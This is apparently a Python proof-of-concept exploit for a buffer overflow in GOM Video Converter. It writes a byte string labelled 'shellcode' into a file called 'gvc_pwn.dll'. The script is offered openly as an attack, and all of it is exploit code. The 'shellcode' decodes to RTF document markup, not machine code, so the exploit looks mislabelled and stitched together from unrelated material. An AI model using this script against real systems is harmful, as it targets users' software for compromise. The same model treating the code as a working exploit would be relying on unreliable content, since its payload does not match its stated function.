#!/usr/bin/python #=============================================================# # GOM Video Converter .dll Buffer Overflow Exploit # # Downloaded from: http://converter.gomlab.com/eng/download/ # # 11/06/2012 # # Ucha Gobejishvili # # Tested Platform: Windows 7 #=============================================================# import os evilfile = "gvc_pwn.dll" shellcode = ("\x7b\x5c\x72\x74\x46\x31\x23\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x73\x68\x70\x69\x6e\x73\x74\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x73\x70\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x67\x65\x6e\x65\x72\x61\x74\x6f\x72\x20\x4d\x73\x66\x74\x65\x64\x69\x74\x20\x35\x2e\x34\x31\x2e\x31\x35\x2e\x31\x35\x30\x37\x3b\x7d\x0b\x69\x65\x77\x6b\x69\x6e\x64\x34\x5c\x75\x63\x31\x5c\x70\x61\x72\x64\x7b\x5c\x70\x6e\x74\x65\x78\x74\x0c\x32\x27\x42\x37\x09\x61\x62\x7d\x7b\x5c\x2a\x5c\x70\x6e\x5c\x70\x6e\x6c\x76\x6c\x62\x6c\x74\x5c\x70\x6e\x66\x32\x5c\x70\x6e\x69\x6e\x64\x65\x6e\x74\x30\x7b\x5c\x70\x6e\x74\x78\x74\x62\x27\x42\x37\x7d\x7d\x0c\x69\x2d\x37\x32\x30\x5c\x6c\x69\x37\x32\x30\x5c\x71\x63\x5c\x63\x66\x31\x5c\x75\x6c\x08\x5c\x69\x0c\x30\x0c\x73\x32\x30\x20\x35\x2f\x32\x38\x2f\x32\x30\x31\x31\x5c\x63\x66\x30\x5c\x75\x6c\x6e\x6f\x6e\x65\x08\x30\x5c\x69\x30\x5c\x70\x61\x72\x5c\x63\x66\x31\x5c\x75\x6c\x08\x5c\x69\x0c\x31\x0c\x73\x34\x30\x7b\x5c\x70\x6e\x74\x65\x78\x74\x0c\x32\x27\x42\x37\x09\x61\x62\x7d\x48\x49\x20\x2e\x2e\x2e\x2e\x2e\x2e\x2e\x2e\x5c\x63\x66\x30\x5c\x75\x6c\x6e\x6f\x6e\x65\x08\x30\x5c\x69\x30\x0c\x30\x0c\x73\x32\x30\x5c\x70\x61\x72\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d") crashy = open(evilfile,"w") crashy.write(shellcode) crashy.close()